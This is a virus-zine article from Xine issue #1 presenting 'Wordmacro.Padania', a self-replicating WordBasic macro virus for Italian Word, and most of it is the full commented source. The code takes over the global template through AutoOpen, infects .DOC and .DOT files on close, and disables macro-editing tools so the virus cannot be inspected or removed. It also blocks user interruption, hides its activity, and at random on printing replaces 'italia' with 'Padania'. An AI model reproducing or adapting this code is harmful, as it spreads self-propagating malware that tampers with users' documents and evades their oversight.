Copy Link
Add to Bookmark
Report
xine-1.023
/-----------------------------\
| Xine - issue #1 - Phile 023 |
\-----------------------------/
___________________
< Wordmacro.Padania >
< b0z0/iKx >
^^^^^^^^^^^^^^^
Well, this is a very simple macro virus written in Wordbasic. I wrote
this for fun (as all the other viriis :) ) and to give an example for the
readers of the article how macro viruses works. It will work on italian
versions of Word for Windows. Well, why italian? Just because i have never
seen a source for a macro virus in this language.
So now some tech specs about it:
- Infacts this macros:
* AutoOpen, AutoExec (to get power)
* FileChiudi, ChiudiDoc (to replicate)
* FileStampaPredef, FileStampa (to strike! ]8) )
* FileExit (to cover the changes)
* FileModelli, StrumMacro (to disable macro editing/reading)
- Infects when the user close a file. The file will be infected when
the user will close the document using the Close action in File menu and
will also infect if a user closes the document doubleclicking on the top
left corner of the wind0ze window.
- Disables all the tools that are used to edit/change macros.
- Isn't interuptable like a lot of other macro viruses :)
- Full check if the document that we are going to infect is a .DOC or
.DOT to prevent strange changes :)
- Funny payload :)
This is my first virus with a payload. Infact i generally don't care to
write destructive payloads or something like. The payload will be randomly
activated sometimes when the user prints a document (with the "normal" or
with the fast print method). The probability that the payload is activated
is of 1:25 for fast prints and of 1:31 on normal prints. When activated
the routine will change all the words 'italia' in the text with 'Padania',
case doesn't matter, but only entire words will be changed. This will be
done totally trasparently: infact the routine will put a bookmark to
remember where the user was in the document, then will rewind to start,
scan and replace the words. At the end of the print (succesfully or not)
the routine will take power again, reput the old text and move again the
pointer on the text to the original location. Of course when all this will
be done also the screen updating will be disabled, so on the screen
nothing will appear :)
Well, don't look at macro names and variables (expecially if you know
italian :) ), i just was very bored when writing in the middle of August
this virus and i just put some casual names :)
Anyway the strange names will make the virus to be less noticeable.
Infact instead of moving as FileExit or something that may seem dangerous,
they will go around with quite funny names :) The only serious macroname
will be AutoOpen... well it can't be changed ;)
well, here comes the source code...
............_________---------^^^^^^^^^^^^---------_________............
MacroName: AutoOpen 'this will be executed at the document opening
Sub MAIN
DisableInput 1 'disable the interruption of the execution
IsInstalled = 0 'installation check
If ContaMacro(0) > 0 Then
For conta = 1 To ContaMacro(0)
If NomeMacro$(conta, 0) = "AutoOpen" Then 'search for it
IsInstalled = 1 'yeah, it is already here
End If
Next conta
End If
If IsInstalled = 0 Then 'if not installed we will copy our macros
CopiaMacro NomeFinestra$() + ":AutoOpen", "Generale:AutoOpen",1
CopiaMacro NomeFinestra$() + ":AutoOpen", "Generale:AutoExec",1
CopiaMacro NomeFinestra$() + ":Panza", "Generale:FileChiudi",1
CopiaMacro NomeFinestra$() + ":BiPanza", "Generale:FileStampaPredef",1
CopiaMacro NomeFinestra$() + ":TriPanza", "Generale:ChiudiDoc",1
CopiaMacro NomeFinestra$() + ":Uscita", "Generale:FileEsci",1
CopiaMacro NomeFinestra$() + ":Ranma", "Generale:FileStampa",1
CopiaMacro NomeFinestra$() + ":Nomacro", "Generale:StrumMacro",1
CopiaMacro NomeFinestra$() + ":Nomacro", "Generale:FileModelli",1
EndIf
End Sub
............_________---------^^^^^^^^^^^^---------_________............
MacroName: BiPanza 'this will go instead of the FileStampaPredef
'FileStampaPredef is the english fast print button
Sub MAIN
DisableInput 1
ScreenUpdating 0 'dont update the screen
xepmi= Int(Rnd() * (25 - 1) + 1) 'put a random value in xepmi between
'1 and 25
if xepmi=15 then 'if 15 then our payload will be activated
ModificaSegnalibro .Nome = "Trux", .Aggiungi 'this put the bookmark
InizioDocumento 'go at the start
ModificaSostituisci .Trova = "italia", .Sostituisci = "Padania",
.SoloParoleIntere = 1, .SostituisciTutto On Error Goto Tardi
End If 'complete our mission
FileStampaPredef 'print the document
Tardi:
If xepmi=15 then 'reput the old words
ModificaSostituisci .Trova = "Padania", .Sostituisci = "italia",
.SoloParoleIntere = 1, .SostituisciTutto 'reput old stuff
If SegnalibroEsistente("Trux") = - 1 Then 'it the bookmark exist
ModificaSegnalibro .Nome = "Trux", .VaiA 'go to it and then delete
ModificaSegnalibro .Nome = "Trux", .Elimina 'it
End If
End If
ScreenUpdating 1 'reenable screen update
End Sub
............_________---------^^^^^^^^^^^^---------_________............
MacroName: Nomacro 'this will be put to prevent macro reading or
'editing
Sub MAIN
DisableInput 1
'hehe, just here to bypass the macro selection
End Sub
............_________---------^^^^^^^^^^^^---------_________............
MacroName: Panza 'this will go instead of the FileChiudi
'FileChiudi is the english FileClose
Sub MAIN
DisableInput 1
infetta = 0
puzzone$ = NomeFinestra$() 'get current name
Our$ = Mid$(puzzone$, Len(puzzone$) - 3)
If ((Our$ = ".DOC") Or (Our$ = ".DOT")) Then
Infetta = 1 'check if it is a DOC or DOT
End If
' if it is a DOC or DOT and it isn't a macro window we will infect it
If ((IsMacro(0) = 0) And (Infetta = 1)) Then
ScreenUpdating 0
CopiaMacro "Generale:AutoOpen", NomeFinestra$() + ":AutoOpen",1
CopiaMacro "Generale:FileChiudi", NomeFinestra$() + ":Panza",1
CopiaMacro "Generale:FileStampaPredef", NomeFinestra$() + ":BiPanza",1
CopiaMacro "Generale:ChiudiDoc", NomeFinestra$() + ":TriPanza",1
CopiaMacro "Generale:FileEsci", NomeFinestra$() + ":Uscita",1
CopiaMacro "Generale:FileStampa", NomeFinestra$() + ":Ranma",1
CopiaMacro "Generale:StrumMacro", NomeFinestra$() + ":Nomacro",1
FileSalvaConNome .Formato = 1
End If
On error Goto gusarji
FileChiudi 'close it!
gusarji:
ScreenUpdating 1
End Sub
............_________---------^^^^^^^^^^^^---------_________............
MacroName: Ranma 'will go instead of FileStampa which is FilePrint
Sub MAIN
DisableInput 1
Dim dlg As FileStampa
On Error Goto Dopo
GetCurValues dlg
Dialog dlg
ScreenUpdating 0
xepmit= Int(Rnd() * (31 - 1) + 1) 'put a random value in xepmi between
'1 and 31
if xepmit=15 then 'if 15 then our payload will be activated
ModificaSegnalibro .Nome = "Trucciolo", .Aggiungi
InizioDocumento
ModificaSostituisci .Trova = "italia", .Sostituisci = "Padania",
.SoloParoleIntere = 1, .SostituisciTutto
End If
FileStampa dlg
if xepmit=15 then
ModificaSostituisci .Trova = "Padania", .Sostituisci = "italia",
.SoloParoleIntere = 1, .SostituisciTutto
If SegnalibroEsistente("Trucciolo") = - 1 Then
ModificaSegnalibro .Nome = "Trucciolo", .VaiA
ModificaSegnalibro .Nome = "Trucciolo", .Elimina
End If
End If
Dopo:
ScreenUpdating 1
End Sub
............_________---------^^^^^^^^^^^^---------_________............
MacroName: TriPanza 'this will be set as the ChiudiDoc macro that
'is executed when the user closes a Document
'window doubleclicking the top-left button
Sub MAIN
DisableInput 1
infetta = 0
puzzone$ = NomeFinestra$() 'get name of the file
Our$ = Mid$(puzzone$, Len(puzzone$) - 3)
If ((Our$ = ".DOC") Or (Our$ = ".DOT")) Then
Infetta = 1 'be sure that it is an infectable
End If 'item
If ((IsMacro(0) = 0) And (Infetta = 1)) Then
ScreenUpdating 0
CopiaMacro "Generale:AutoOpen", NomeFinestra$() + ":AutoOpen",1
CopiaMacro "Generale:FileChiudi", NomeFinestra$() + ":Panza",1
CopiaMacro "Generale:FileStampaPredef", NomeFinestra$() + ":BiPanza",1
CopiaMacro "Generale:ChiudiDoc", NomeFinestra$() + ":TriPanza",1
CopiaMacro "Generale:FileEsci", NomeFinestra$() + ":Uscita",1
CopiaMacro "Generale:FileStampa", NomeFinestra$() + ":Ranma",1
CopiaMacro "Generale:StrumMacro", NomeFinestra$() + ":Nomacro",1
FileSalvaConNome .Formato = 1
End If
ChiudiDoc 'call the old function
ScreenUpdating 1 'reenable updating
End Sub
............_________---------^^^^^^^^^^^^---------_________............
MacroName: Uscita 'will go instead of the FileEsci which is FileExit
Sub MAIN
DisableInput 1
StrumOpzioniSalva .SalvataggioNormalDot = 0 'enable fast save of normal.dot
StrumOpzioniSalva .SalvaVeloce = 1 'enable fast save for all the docs
FileEsci 'exit the file
End Sub
............_________---------^^^^^^^^^^^^---------_________............